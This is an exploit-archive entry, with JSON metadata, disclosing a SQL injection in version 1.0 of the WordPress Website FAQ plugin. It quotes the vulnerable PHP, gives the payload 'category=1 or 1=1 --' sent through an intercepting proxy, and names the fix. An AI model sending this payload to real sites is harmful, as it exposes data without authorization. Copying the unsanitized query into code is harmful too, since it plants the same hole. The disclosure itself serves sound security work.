ID 1337DAY-ID-18825 Type zdt Reporter Chris Kellum Modified 2012-06-26T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
# Date: 6/25/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
# Version: 1.0
==============================================================================
Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
==============================================================================
Lines 106-115:
function displayAnswer()
{
global $wpdb;
$master_table = $wpdb->prefix . "faq";
$category = $_POST['category'];
$searchtxt = $_POST['searchtxt'];
if($category!=0)
{
$sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
}
===============================================================
Vulnerability Details: faq_category (compared against the unsanitized `category` POST parameter) vulnerable to SQL injection
===============================================================
When submitting a query via the widget, intercept the POST request with Burp or another intercepting proxy to find the following:
action=displayAnswer&category=1&searchtxt=[your query]
Changing category=1 to category=1 or 1=1 -- exposes the vulnerability: because the `category` value is concatenated into the WHERE clause unquoted and unsanitized (line 22 of the excerpt above), the query returns all FAQ results regardless of the searchtxt value. The query should instead be built with $wpdb->prepare() and the category cast to an integer.
{"id": "1337DAY-ID-18825", "lastseen": "2018-02-16T03:22:10", "viewCount": 6, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-02-16T03:22:10", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/NOVELL/ZENWORKS_PREBOOT_OP6C_BOF", "MSF:EXPLOIT/WINDOWS/BROWSER/CISCO_PLAYERPT_SETSOURCE", "MSF:AUXILIARY/SCANNER/HTTP/MANAGEENGINE_DEVICEEXPERT_TRAVERSAL", "MSF:EXPLOIT/UNIX/MISC/XEROX_MFP", "MSF:EXPLOIT/WINDOWS/BROWSER/VLC_MMS_BOF"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8547", "SECURITYVULNS:DOC:18825"]}], "modified": "2018-02-16T03:22:10", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "sourceHref": "https://0day.today/exploit/18825", "description": "Exploit for php platform in category web applications", "title": "WordPress Website FAQ Plugin v1.0 SQL Injection", "cvelist": [], "sourceData": "# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection\r\n# Date: 6/25/12\r\n# Exploit Author: Chris Kellum\r\n# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/\r\n# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip\r\n# Version: 1.0\r\n \r\n \r\n==============================================================================\r\nVulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php\r\n==============================================================================\r\n \r\n Lines 106-115:\r\n \r\n function displayAnswer()\r\n {\r\n global $wpdb;\r\n $master_table = $wpdb->prefix . 
\"faq\";\r\n $category = $_POST['category'];\r\n $searchtxt = $_POST['searchtxt'];\r\n if($category!=0)\r\n {\r\n $sql = \"SELECT * FROM $master_table WHERE faq_category=\".$category.\" AND faq_question LIKE '%\".$searchtxt.\"%'\";\r\n }\r\n \r\n===============================================================\r\nVulnerability Details: faq_category vulnerable to SQL injection\r\n===============================================================\r\n \r\nWhen submitting a query via the widget, intercept the post request via burp or other proxy to find the following:\r\n \r\n action=displayAnswer&category=1&searchtxt=[your query]\r\n \r\nChanging category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.\r\n\r\n\n\n# 0day.today [2018-02-16] #", "published": "2012-06-26T00:00:00", "references": [], "reporter": "Chris Kellum", "modified": "2012-06-26T00:00:00", "href": "https://0day.today/exploit/description/18825"}